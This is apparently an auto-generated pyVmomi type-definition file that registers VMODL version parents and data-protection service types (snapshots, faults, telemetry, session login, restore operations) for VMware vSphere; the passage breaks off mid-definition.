AddVersionParent("vim.version.Vmfs_Unmap_Ultralow_Rate", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.Vmfs_Unmap_Ultralow_Rate", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.Vmfs_Unmap_Ultralow_Rate", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.Vmfs_Unmap_Ultralow_Rate", "vim.version.version13")
AddVersionParent("vim.version.Vmfs_Unmap_Ultralow_Rate", "vim.version.version14")
AddVersionParent("vim.version.Vmfs_Unmap_Ultralow_Rate", "vim.version.version15")
AddVersionParent("vim.version.Vmfs_Unmap_Ultralow_Rate", "vim.version.version10")
AddVersionParent("vim.version.Vmfs_Unmap_Ultralow_Rate", "vim.version.version11")
AddVersionParent("vim.version.Vmfs_Unmap_Ultralow_Rate", "vim.version.version12")
AddVersionParent("vim.version.Vmfs_Unmap_Ultralow_Rate", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.Vmfs_Unmap_Ultralow_Rate", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.Vmfs_Unmap_Ultralow_Rate", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.Vmfs_Unmap_Ultralow_Rate", "vim.version.v7_0")
AddVersionParent("vim.version.Vmfs_Unmap_Ultralow_Rate", "vim.version.version8")
AddVersionParent("vim.version.Vmfs_Unmap_Ultralow_Rate", "vim.version.version9")
AddVersionParent("vim.version.Vmfs_Unmap_Ultralow_Rate", "vim.version.version6")
AddVersionParent("vim.version.Vmfs_Unmap_Ultralow_Rate", "vim.version.version7")
AddVersionParent("vim.version.Vmfs_Unmap_Ultralow_Rate", "vim.version.version1")
AddVersionParent("vim.version.Vmfs_Unmap_Ultralow_Rate", "vim.version.version4")
AddVersionParent("vim.version.Vmfs_Unmap_Ultralow_Rate", "vim.version.version5")
AddVersionParent("vim.version.Vmfs_Unmap_Ultralow_Rate", "vim.version.version2")
AddVersionParent("vim.version.Vmfs_Unmap_Ultralow_Rate", "vim.version.version3")
AddVersionParent("vim.version.Vmfs_Unmap_Ultralow_Rate", "vim.version.Vmfs_Unmap_Ultralow_Rate")
AddVersionParent("vim.version.VMcrypt3_KeyCustomAttribute", "vmodl.query.version.version4")
AddVersionParent("vim.version.VMcrypt3_KeyCustomAttribute", "vmodl.query.version.version3")
AddVersionParent("vim.version.VMcrypt3_KeyCustomAttribute", "vmodl.query.version.version2")
AddVersionParent("vim.version.VMcrypt3_KeyCustomAttribute", "vmodl.query.version.version1")
AddVersionParent("vim.version.VMcrypt3_KeyCustomAttribute", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.VMcrypt3_KeyCustomAttribute", "vmodl.version.version0")
AddVersionParent("vim.version.VMcrypt3_KeyCustomAttribute", "vmodl.version.version1")
AddVersionParent("vim.version.VMcrypt3_KeyCustomAttribute", "vmodl.version.version2")
AddVersionParent("vim.version.VMcrypt3_KeyCustomAttribute", "vim.version.v6_9_1")
AddVersionParent("vim.version.VMcrypt3_KeyCustomAttribute", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.VMcrypt3_KeyCustomAttribute", "vim.version.v6_8_7")
AddVersionParent("vim.version.VMcrypt3_KeyCustomAttribute", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.VMcrypt3_KeyCustomAttribute", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.VMcrypt3_KeyCustomAttribute", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.VMcrypt3_KeyCustomAttribute", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.VMcrypt3_KeyCustomAttribute", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.VMcrypt3_KeyCustomAttribute", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.VMcrypt3_KeyCustomAttribute", "vim.version.version13")
AddVersionParent("vim.version.VMcrypt3_KeyCustomAttribute", "vim.version.version14")
AddVersionParent("vim.version.VMcrypt3_KeyCustomAttribute", "vim.version.version15")
AddVersionParent("vim.version.VMcrypt3_KeyCustomAttribute", "vim.version.version10")
AddVersionParent("vim.version.VMcrypt3_KeyCustomAttribute", "vim.version.version11")
AddVersionParent("vim.version.VMcrypt3_KeyCustomAttribute", "vim.version.version12")
AddVersionParent("vim.version.VMcrypt3_KeyCustomAttribute", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.VMcrypt3_KeyCustomAttribute", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.VMcrypt3_KeyCustomAttribute", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.VMcrypt3_KeyCustomAttribute", "vim.version.v7_0")
AddVersionParent("vim.version.VMcrypt3_KeyCustomAttribute", "vim.version.version8")
AddVersionParent("vim.version.VMcrypt3_KeyCustomAttribute", "vim.version.version9")
AddVersionParent("vim.version.VMcrypt3_KeyCustomAttribute", "vim.version.version6")
AddVersionParent("vim.version.VMcrypt3_KeyCustomAttribute", "vim.version.version7")
AddVersionParent("vim.version.VMcrypt3_KeyCustomAttribute", "vim.version.version1")
AddVersionParent("vim.version.VMcrypt3_KeyCustomAttribute", "vim.version.version4")
AddVersionParent("vim.version.VMcrypt3_KeyCustomAttribute", "vim.version.version5")
AddVersionParent("vim.version.VMcrypt3_KeyCustomAttribute", "vim.version.version2")
AddVersionParent("vim.version.VMcrypt3_KeyCustomAttribute", "vim.version.version3")
AddVersionParent("vim.version.VMcrypt3_KeyCustomAttribute", "vim.version.VMcrypt3_KeyCustomAttribute")
AddVersionParent("vim.version.E2ENativeNVMeSupport", "vmodl.query.version.version4")
AddVersionParent("vim.version.E2ENativeNVMeSupport", "vmodl.query.version.version3")
AddVersionParent("vim.version.E2ENativeNVMeSupport", "vmodl.query.version.version2")
AddVersionParent("vim.version.E2ENativeNVMeSupport", "vmodl.query.version.version1")
AddVersionParent("vim.version.E2ENativeNVMeSupport", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.E2ENativeNVMeSupport", "vmodl.version.version0")
AddVersionParent("vim.version.E2ENativeNVMeSupport", "vmodl.version.version1")
AddVersionParent("vim.version.E2ENativeNVMeSupport", "vmodl.version.version2")
AddVersionParent("vim.version.E2ENativeNVMeSupport", "vim.version.v6_9_1")
AddVersionParent("vim.version.E2ENativeNVMeSupport", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.E2ENativeNVMeSupport", "vim.version.v6_8_7")
AddVersionParent("vim.version.E2ENativeNVMeSupport", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.E2ENativeNVMeSupport", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.E2ENativeNVMeSupport", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.E2ENativeNVMeSupport", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.E2ENativeNVMeSupport", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.E2ENativeNVMeSupport", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.E2ENativeNVMeSupport", "vim.version.version13")
AddVersionParent("vim.version.E2ENativeNVMeSupport", "vim.version.version14")
AddVersionParent("vim.version.E2ENativeNVMeSupport", "vim.version.version15")
AddVersionParent("vim.version.E2ENativeNVMeSupport", "vim.version.version10")
AddVersionParent("vim.version.E2ENativeNVMeSupport", "vim.version.version11")
AddVersionParent("vim.version.E2ENativeNVMeSupport", "vim.version.version12")
AddVersionParent("vim.version.E2ENativeNVMeSupport", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.E2ENativeNVMeSupport", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.E2ENativeNVMeSupport", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.E2ENativeNVMeSupport", "vim.version.v7_0")
AddVersionParent("vim.version.E2ENativeNVMeSupport", "vim.version.version8")
AddVersionParent("vim.version.E2ENativeNVMeSupport", "vim.version.version9")
AddVersionParent("vim.version.E2ENativeNVMeSupport", "vim.version.version6")
AddVersionParent("vim.version.E2ENativeNVMeSupport", "vim.version.version7")
AddVersionParent("vim.version.E2ENativeNVMeSupport", "vim.version.version1")
AddVersionParent("vim.version.E2ENativeNVMeSupport", "vim.version.version4")
AddVersionParent("vim.version.E2ENativeNVMeSupport", "vim.version.version5")
AddVersionParent("vim.version.E2ENativeNVMeSupport", "vim.version.version2")
AddVersionParent("vim.version.E2ENativeNVMeSupport", "vim.version.version3")
AddVersionParent("vim.version.E2ENativeNVMeSupport", "vim.version.E2ENativeNVMeSupport")
AddVersionParent("vim.version.FCD_PERFORMANCE", "vmodl.query.version.version4")
AddVersionParent("vim.version.FCD_PERFORMANCE", "vmodl.query.version.version3")
AddVersionParent("vim.version.FCD_PERFORMANCE", "vmodl.query.version.version2")
AddVersionParent("vim.version.FCD_PERFORMANCE", "vmodl.query.version.version1")
AddVersionParent("vim.version.FCD_PERFORMANCE", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.FCD_PERFORMANCE", "vmodl.version.version0")
AddVersionParent("vim.version.FCD_PERFORMANCE", "vmodl.version.version1")
AddVersionParent("vim.version.FCD_PERFORMANCE", "vmodl.version.version2")
AddVersionParent("vim.version.FCD_PERFORMANCE", "vim.version.v6_9_1")
AddVersionParent("vim.version.FCD_PERFORMANCE", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.FCD_PERFORMANCE", "vim.version.v6_8_7")
AddVersionParent("vim.version.FCD_PERFORMANCE", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.FCD_PERFORMANCE", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.FCD_PERFORMANCE", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.FCD_PERFORMANCE", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.FCD_PERFORMANCE", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.FCD_PERFORMANCE", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.FCD_PERFORMANCE", "vim.version.version13")
AddVersionParent("vim.version.FCD_PERFORMANCE", "vim.version.version14")
AddVersionParent("vim.version.FCD_PERFORMANCE", "vim.version.version15")
AddVersionParent("vim.version.FCD_PERFORMANCE", "vim.version.version10")
AddVersionParent("vim.version.FCD_PERFORMANCE", "vim.version.version11")
AddVersionParent("vim.version.FCD_PERFORMANCE", "vim.version.version12")
AddVersionParent("vim.version.FCD_PERFORMANCE", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.FCD_PERFORMANCE", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.FCD_PERFORMANCE", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.FCD_PERFORMANCE", "vim.version.v7_0")
AddVersionParent("vim.version.FCD_PERFORMANCE", "vim.version.version8")
AddVersionParent("vim.version.FCD_PERFORMANCE", "vim.version.version9")
AddVersionParent("vim.version.FCD_PERFORMANCE", "vim.version.version6")
AddVersionParent("vim.version.FCD_PERFORMANCE", "vim.version.version7")
AddVersionParent("vim.version.FCD_PERFORMANCE", "vim.version.version1")
AddVersionParent("vim.version.FCD_PERFORMANCE", "vim.version.version4")
AddVersionParent("vim.version.FCD_PERFORMANCE", "vim.version.version5")
AddVersionParent("vim.version.FCD_PERFORMANCE", "vim.version.version2")
AddVersionParent("vim.version.FCD_PERFORMANCE", "vim.version.version3")
AddVersionParent("vim.version.FCD_PERFORMANCE", "vim.version.FCD_PERFORMANCE")
AddVersionParent("vim.version.SPBM_DISK_PROV_VIA_POLICY", "vmodl.query.version.version4")
AddVersionParent("vim.version.SPBM_DISK_PROV_VIA_POLICY", "vmodl.query.version.version3")
AddVersionParent("vim.version.SPBM_DISK_PROV_VIA_POLICY", "vmodl.query.version.version2")
AddVersionParent("vim.version.SPBM_DISK_PROV_VIA_POLICY", "vmodl.query.version.version1")
AddVersionParent("vim.version.SPBM_DISK_PROV_VIA_POLICY", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.SPBM_DISK_PROV_VIA_POLICY", "vmodl.version.version0")
AddVersionParent("vim.version.SPBM_DISK_PROV_VIA_POLICY", "vmodl.version.version1")
AddVersionParent("vim.version.SPBM_DISK_PROV_VIA_POLICY", "vmodl.version.version2")
AddVersionParent("vim.version.SPBM_DISK_PROV_VIA_POLICY", "vim.version.v6_9_1")
AddVersionParent("vim.version.SPBM_DISK_PROV_VIA_POLICY", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.SPBM_DISK_PROV_VIA_POLICY", "vim.version.v6_8_7")
AddVersionParent("vim.version.SPBM_DISK_PROV_VIA_POLICY", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.SPBM_DISK_PROV_VIA_POLICY", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.SPBM_DISK_PROV_VIA_POLICY", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.SPBM_DISK_PROV_VIA_POLICY", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.SPBM_DISK_PROV_VIA_POLICY", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.SPBM_DISK_PROV_VIA_POLICY", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.SPBM_DISK_PROV_VIA_POLICY", "vim.version.version13")
AddVersionParent("vim.version.SPBM_DISK_PROV_VIA_POLICY", "vim.version.version14")
AddVersionParent("vim.version.SPBM_DISK_PROV_VIA_POLICY", "vim.version.version15")
AddVersionParent("vim.version.SPBM_DISK_PROV_VIA_POLICY", "vim.version.version10")
AddVersionParent("vim.version.SPBM_DISK_PROV_VIA_POLICY", "vim.version.version11")
AddVersionParent("vim.version.SPBM_DISK_PROV_VIA_POLICY", "vim.version.version12")
AddVersionParent("vim.version.SPBM_DISK_PROV_VIA_POLICY", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.SPBM_DISK_PROV_VIA_POLICY", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.SPBM_DISK_PROV_VIA_POLICY", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.SPBM_DISK_PROV_VIA_POLICY", "vim.version.v7_0")
AddVersionParent("vim.version.SPBM_DISK_PROV_VIA_POLICY", "vim.version.version8")
AddVersionParent("vim.version.SPBM_DISK_PROV_VIA_POLICY", "vim.version.version9")
AddVersionParent("vim.version.SPBM_DISK_PROV_VIA_POLICY", "vim.version.version6")
AddVersionParent("vim.version.SPBM_DISK_PROV_VIA_POLICY", "vim.version.version7")
AddVersionParent("vim.version.SPBM_DISK_PROV_VIA_POLICY", "vim.version.version1")
AddVersionParent("vim.version.SPBM_DISK_PROV_VIA_POLICY", "vim.version.version4")
AddVersionParent("vim.version.SPBM_DISK_PROV_VIA_POLICY", "vim.version.version5")
AddVersionParent("vim.version.SPBM_DISK_PROV_VIA_POLICY", "vim.version.version2")
AddVersionParent("vim.version.SPBM_DISK_PROV_VIA_POLICY", "vim.version.version3")
AddVersionParent("vim.version.SPBM_DISK_PROV_VIA_POLICY", "vim.version.SPBM_DISK_PROV_VIA_POLICY")
AddVersionParent("vim.version.nsx_uens_u2", "vmodl.query.version.version4")
AddVersionParent("vim.version.nsx_uens_u2", "vmodl.query.version.version3")
AddVersionParent("vim.version.nsx_uens_u2", "vmodl.query.version.version2")
AddVersionParent("vim.version.nsx_uens_u2", "vmodl.query.version.version1")
AddVersionParent("vim.version.nsx_uens_u2", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.nsx_uens_u2", "vmodl.version.version0")
AddVersionParent("vim.version.nsx_uens_u2", "vmodl.version.version1")
AddVersionParent("vim.version.nsx_uens_u2", "vmodl.version.version2")
AddVersionParent("vim.version.nsx_uens_u2", "vim.version.v6_9_1")
AddVersionParent("vim.version.nsx_uens_u2", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.nsx_uens_u2", "vim.version.v6_8_7")
AddVersionParent("vim.version.nsx_uens_u2", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.nsx_uens_u2", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.nsx_uens_u2", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.nsx_uens_u2", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.nsx_uens_u2", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.nsx_uens_u2", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.nsx_uens_u2", "vim.version.version13")
AddVersionParent("vim.version.nsx_uens_u2", "vim.version.version14")
AddVersionParent("vim.version.nsx_uens_u2", "vim.version.version15")
AddVersionParent("vim.version.nsx_uens_u2", "vim.version.version10")
AddVersionParent("vim.version.nsx_uens_u2", "vim.version.version11")
AddVersionParent("vim.version.nsx_uens_u2", "vim.version.version12")
AddVersionParent("vim.version.nsx_uens_u2", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.nsx_uens_u2", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.nsx_uens_u2", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.nsx_uens_u2", "vim.version.v7_0")
AddVersionParent("vim.version.nsx_uens_u2", "vim.version.version8")
AddVersionParent("vim.version.nsx_uens_u2", "vim.version.version9")
AddVersionParent("vim.version.nsx_uens_u2", "vim.version.version6")
AddVersionParent("vim.version.nsx_uens_u2", "vim.version.version7")
AddVersionParent("vim.version.nsx_uens_u2", "vim.version.version1")
AddVersionParent("vim.version.nsx_uens_u2", "vim.version.version4")
AddVersionParent("vim.version.nsx_uens_u2", "vim.version.version5")
AddVersionParent("vim.version.nsx_uens_u2", "vim.version.version2")
AddVersionParent("vim.version.nsx_uens_u2", "vim.version.version3")
AddVersionParent("vim.version.nsx_uens_u2", "vim.version.nsx_uens_u2")
newestVersions.Add("dp.version.unstable")
ltsVersions.Add("dp.version.v8_0_0_0")
dottedVersions.Add("dp.version.v8_0_0_0")
oldestVersions.Add("dp.version.version1")
CreateDataType("dp.ProtectedEntity", "DpProtectedEntity", "vmodl.DynamicData", "dp.version.version1", None)
CreateDataType("dp.ProtectedEntitySnapshot", "DpProtectedEntitySnapshot", "vmodl.DynamicData", "dp.version.VSPHERE_DP_PER_DISK_SNAPSHOT", [("uuid", "string", "dp.version.VSPHERE_DP_PER_DISK_SNAPSHOT", 0)])
CreateDataType("dp.SnapshotIdentifier", "DpSnapshotIdentifier", "vmodl.DynamicData", "dp.version.version1", None)
CreateDataType("dp.UserIdBinding", "DpUserIdBinding", "vmodl.DynamicData", "dp.version.version1", None)
CreateDataType("dp.VirtualMachineDiskSnapshot", "DpVirtualMachineDiskSnapshot", "vmodl.DynamicData", "dp.version.VSPHERE_DP_PER_DISK_SNAPSHOT", [("diskKey", "int", "dp.version.VSPHERE_DP_PER_DISK_SNAPSHOT", 0), ("snapshotUuid", "string", "dp.version.VSPHERE_DP_PER_DISK_SNAPSHOT", 0)])
CreateDataType("dp.VirtualMachineProtectedEntity", "DpVirtualMachineProtectedEntity", "dp.ProtectedEntity", "dp.version.version1", [("vmRef", "vim.VirtualMachine", "dp.version.version1", 0), ("includedDiskKeys", "int[]", "dp.version.version1", F_OPTIONAL), ("instanceUuid", "string", "dp.version.version1", F_OPTIONAL)])
CreateDataType("dp.VirtualMachineProtectedEntitySnapshot", "DpVirtualMachineProtectedEntitySnapshot", "dp.ProtectedEntitySnapshot", "dp.version.VSPHERE_DP_PER_DISK_SNAPSHOT", [("diskSnapshots", "dp.VirtualMachineDiskSnapshot[]", "dp.version.VSPHERE_DP_PER_DISK_SNAPSHOT", F_OPTIONAL)])
CreateDataType("dp.VirtualMachineUserIdBinding", "DpVirtualMachineUserIdBinding", "dp.UserIdBinding", "dp.version.version1", [("diskIds", "dp.VirtualMachineUserIdBinding.DiskIdBinding[]", "dp.version.version1", F_OPTIONAL)])
CreateDataType("dp.VirtualMachineUserIdBinding.DiskIdBinding", "DpVirtualMachineUserIdBindingDiskIdBinding", "vmodl.DynamicData", "dp.version.version1", [("diskKey", "int", "dp.version.version1", 0), ("id", "string", "dp.version.version1", 0)])
CreateManagedType("dp.dpd.ServiceInstance", "DpdServiceInstance", "vmodl.ManagedObject", "dp.version.version1", [("content", "dp.dpd.ServiceInstanceContent", "dp.version.version1", 0, "System.Anonymous")], None)
CreateDataType("dp.dpd.ServiceInstanceContent", "DpdServiceInstanceContent", "vmodl.DynamicData", "dp.version.version1", [("about", "vim.AboutInfo", "dp.version.version1", 0), ("instanceUuid", "string", "dp.version.version1", 0), ("protectionService", "dp.ProtectionService", "dp.version.version1", 0), ("propertyCollector", "vmodl.query.PropertyCollector", "dp.version.version1", 0), ("stressOptions", "vim.option.OptionManager", "dp.version.version1", 0)])
CreateManagedType("dp.dpd.SessionManager", "DpdSessionManager", "vmodl.ManagedObject", "dp.version.version1", None, [("userLoginByVpSecret", "UserLoginByVpSecret", "dp.version.version1", (("token", "string", "dp.version.version1", F_SECRET, None),("locale", "string", "dp.version.version1", F_OPTIONAL, None),), (0, "void", "void"), "System.Anonymous", ["dp.fault.InvalidLogin", "dp.fault.AlreadyLoggedIn", "vim.fault.InvalidLocale", "dp.fault.NoServerCredential", ]), ("userLogout", "UserLogout", "dp.version.version1", (), (0, "void", "void"), None, None)])
CreateDataType("dp.fault.DataProtectionFault", "DpFaultDataProtectionFault", "vmodl.MethodFault", "dp.version.version1", None)
CreateDataType("dp.fault.DataProtectionRuntimeFault", "DpFaultDataProtectionRuntimeFault", "vmodl.RuntimeFault", "dp.version.version1", None)
CreateDataType("dp.fault.DpFault", "DpFaultDpFault", "vmodl.RuntimeFault", "dp.version.version1", None)
CreateDataType("dp.fault.DpdBusy", "DpFaultDpdBusy", "dp.fault.DpFault", "dp.version.version1", None)
CreateDataType("dp.fault.FullSyncRequired", "DpFaultFullSyncRequired", "dp.fault.DpFault", "dp.version.version1", None)
CreateDataType("dp.fault.InvalidLogin", "DpFaultInvalidLogin", "dp.fault.DpFault", "dp.version.version1", None)
CreateDataType("dp.fault.InvalidSnapshot", "DpFaultInvalidSnapshot", "dp.fault.DpFault", "dp.version.version1", None)
CreateDataType("dp.fault.InvalidSource", "DpFaultInvalidSource", "dp.fault.DataProtectionFault", "dp.version.version1", None)
CreateDataType("dp.fault.NoServerCredential", "DpFaultNoServerCredential", "dp.fault.DpFault", "dp.version.version1", None)
CreateDataType("dp.fault.NotLoggedIn", "DpFaultNotLoggedIn", "dp.fault.DpFault", "dp.version.version1", None)
CreateDataType("dp.fault.OperationInterrupted", "DpFaultOperationInterrupted", "dp.fault.DpFault", "dp.version.version1", None)
CreateDataType("dp.fault.PeIncompleteRequest", "DpFaultPeIncompleteRequest", "dp.fault.DpFault", "dp.version.version1", None)
CreateDataType("dp.fault.PePartiallyProtected", "DpFaultPePartiallyProtected", "dp.fault.DpFault", "dp.version.version1", None)
CreateDataType("dp.fault.QuiesceFailure", "DpFaultQuiesceFailure", "dp.fault.DpFault", "dp.version.VSPHERE_DP_QUIESCED_SNAPSHOT", [("quiescePhase", "string", "dp.version.VSPHERE_DP_QUIESCED_SNAPSHOT", 0)])
CreateEnumType("dp.fault.QuiesceFailure.GuestQuiescePhase", "DpFaultQuiesceFailureGuestQuiescePhase", "dp.version.version1", ["beginPhase", "endPhase"])
CreateDataType("dp.fault.RestoreInProgress", "DpFaultRestoreInProgress", "dp.fault.DpFault", "dp.version.version1", [("restoreId", "string", "dp.version.version1", 0)])
CreateDataType("dp.fault.SnapshotInProgress", "DpFaultSnapshotInProgress", "dp.fault.DpFault", "dp.version.version1", [("snapshotId", "string", "dp.version.version1", 0)])
CreateDataType("dp.fault.SnapshotNotFound", "DpFaultSnapshotNotFound", "dp.fault.DpFault", "dp.version.version1", None)
CreateDataType("dp.fault.SnapshotTransportFault", "DpFaultSnapshotTransportFault", "dp.fault.DpFault", "dp.version.version1", [("transportProviderResults", "vim.KeyValue[]", "dp.version.version1", F_OPTIONAL)])
CreateDataType("dp.fault.SyncInProgress", "DpFaultSyncInProgress", "dp.fault.DpFault", "dp.version.version1", [("syncId", "string", "dp.version.version1", 0)])
CreateManagedType("dp.telemetry.TelemetryStats", "DpTelemetryTelemetryStats", "vmodl.ManagedObject", "dp.version.VSPHERE_DP_TELEMETRY", None, None)
CreateEnumType("dp.telemetry.TelemetryStats.DpdTelemetryCategory", "DpTelemetryTelemetryStatsDpdTelemetryCategory", "dp.version.VSPHERE_DP_TELEMETRY", ["general", "snapshot"])
CreateDataType("dp.telemetry.TelemetryStats.QueryMetricsSpec", "DpTelemetryTelemetryStatsQueryMetricsSpec", "vmodl.DynamicData", "dp.version.VSPHERE_DP_TELEMETRY", [("categories", "string[]", "dp.version.VSPHERE_DP_TELEMETRY", F_OPTIONAL), ("peList", "dp.ProtectedEntity[]", "dp.version.VSPHERE_DP_TELEMETRY", F_OPTIONAL), ("minMetricsUpdateTime", "vmodl.DateTime", "dp.version.VSPHERE_DP_TELEMETRY", F_OPTIONAL)])
CreateDataType("dp.telemetry.TelemetryStats.MetricResult", "DpTelemetryTelemetryStatsMetricResult", "vmodl.DynamicData", "dp.version.VSPHERE_DP_TELEMETRY", [("csvData", "string[]", "dp.version.VSPHERE_DP_TELEMETRY", F_OPTIONAL), ("vmIndexTable", "vim.KeyValue[]", "dp.version.VSPHERE_DP_TELEMETRY", F_OPTIONAL), ("vdiskIndexTable", "vim.KeyValue[]", "dp.version.VSPHERE_DP_TELEMETRY", F_OPTIONAL), ("lwdSnapshotIndexTable", "vim.KeyValue[]", "dp.version.VSPHERE_DP_TELEMETRY", F_OPTIONAL), ("csvColumnIndexMap", "vim.KeyValue[]", "dp.version.VSPHERE_DP_TELEMETRY", F_OPTIONAL)])
CreateDataType("dp.telemetry.TelemetryStats.MetricResults", "DpTelemetryTelemetryStatsMetricResults", "vmodl.DynamicData", "dp.version.VSPHERE_DP_TELEMETRY", [("hostTime", "vmodl.DateTime", "dp.version.VSPHERE_DP_TELEMETRY", 0), ("metrics", "dp.telemetry.TelemetryStats.MetricResult[]", "dp.version.VSPHERE_DP_TELEMETRY", F_OPTIONAL)])
CreateDataType("dp.telemetry.TelemetryStats.HostMetricResult", "DpTelemetryTelemetryStatsHostMetricResult", "dp.telemetry.TelemetryStats.MetricResult", "dp.version.VSPHERE_DP_TELEMETRY", None)
CreateDataType("dp.telemetry.TelemetryStats.SnapshotOpMetricResult", "DpTelemetryTelemetryStatsSnapshotOpMetricResult", "dp.telemetry.TelemetryStats.MetricResult", "dp.version.VSPHERE_DP_TELEMETRY", None)
CreateDataType("dp.telemetry.TelemetryStats.SyncOpMetricResult", "DpTelemetryTelemetryStatsSyncOpMetricResult", "dp.telemetry.TelemetryStats.MetricResult", "dp.version.VSPHERE_DP_TELEMETRY", [("lwdSyncTypeIndexTable", "vim.KeyValue[]", "dp.version.VSPHERE_DP_TELEMETRY", F_OPTIONAL)])
CreateDataType("dp.telemetry.TelemetryStats.MetricInfo", "DpTelemetryTelemetryStatsMetricInfo", "vmodl.DynamicData", "dp.version.VSPHERE_DP_TELEMETRY", [("name", "string", "dp.version.VSPHERE_DP_TELEMETRY", 0), ("description", "string", "dp.version.VSPHERE_DP_TELEMETRY", 0), ("unit", "string", "dp.version.VSPHERE_DP_TELEMETRY", 0), ("category", "string", "dp.version.VSPHERE_DP_TELEMETRY", 0)])
CreateDataType("dp.LocalDiskProtectedEntity", "DpLocalDiskProtectedEntity", "dp.ProtectedEntity", "dp.version.version1", [("id", "string", "dp.version.version1", 0), ("disks", "dp.LocalDiskProtectedEntity.Disk[]", "dp.version.version1", F_OPTIONAL)])
CreateDataType("dp.LocalDiskProtectedEntity.Disk", "DpLocalDiskProtectedEntityDisk", "vmodl.DynamicData", "dp.version.version1", [("uuid", "string", "dp.version.version1", 0), ("path", "string", "dp.version.version1", 0)])
CreateDataType("dp.LocalDiskUserIdBinding", "DpLocalDiskUserIdBinding", "dp.UserIdBinding", "dp.version.version1", [("diskIds", "dp.LocalDiskUserIdBinding.DiskIdBinding[]", "dp.version.version1", F_OPTIONAL)])
CreateDataType("dp.LocalDiskUserIdBinding.DiskIdBinding", "DpLocalDiskUserIdBindingDiskIdBinding", "vmodl.DynamicData", "dp.version.version1", [("path", "string", "dp.version.version1", 0), ("id", "string", "dp.version.version1", 0)])
CreateManagedType("dp.ProtectionService", "DpProtectionService", "vmodl.ManagedObject", "dp.version.version1", None, [("retireSnapshot", "RetireSnapshot", "dp.version.version1", (("spec", "dp.ProtectionService.RetireSnapshotOp.Spec", "dp.version.version1", 0, None),), (0, "dp.ProtectionService.RetireSnapshotOp", "dp.ProtectionService.RetireSnapshotOp"), None, ["vim.fault.NotFound", "vim.fault.InvalidHostState", ]), ("cancelSnapshot", "CancelSnapshot", "dp.version.version1", (("spec", "dp.ProtectionService.CancelSnapshotOp.Spec", "dp.version.version1", 0, None),), (0, "dp.ProtectionService.CancelSnapshotOp", "dp.ProtectionService.CancelSnapshotOp"), None, ["vim.fault.NotFound", "vim.fault.InvalidHostState", ]), ("snapshot", "Snapshot", "dp.version.version1", (("spec", "dp.ProtectionService.SnapshotOp.Spec", "dp.version.version1", 0, None),), (0, "dp.ProtectionService.SnapshotOp", "dp.ProtectionService.SnapshotOp"), None, ["vim.fault.InvalidHostState", ]), ("sync", "Sync", "dp.version.version1", (("spec", "dp.ProtectionService.SyncOp.Spec", "dp.version.version1", 0, None),), (0, "dp.ProtectionService.SyncOp", "dp.ProtectionService.SyncOp"), None, ["vim.fault.NotFound", "vim.fault.InvalidHostState", ]), ("PrepareRestore", "PrepareRestore", "dp.version.version1", (("spec", "dp.ProtectionService.PrepareRestoreOp.Spec", "dp.version.version1", 0, None),), (0, "dp.ProtectionService.PrepareRestoreOp", "dp.ProtectionService.PrepareRestoreOp"), None, ["vim.fault.NotFound", "vim.fault.InvalidHostState", ]), ("CommitRestore", "CommitRestore", "dp.version.version1", (("spec", "dp.ProtectionService.CommitRestoreOp.Spec", "dp.version.version1", 0, None),), (0, "dp.ProtectionService.CommitRestoreOp", "dp.ProtectionService.CommitRestoreOp"), None, ["vim.fault.NotFound", "vim.fault.InvalidHostState", ]), ("QueryMetricCategories", "QueryMetricCategories", 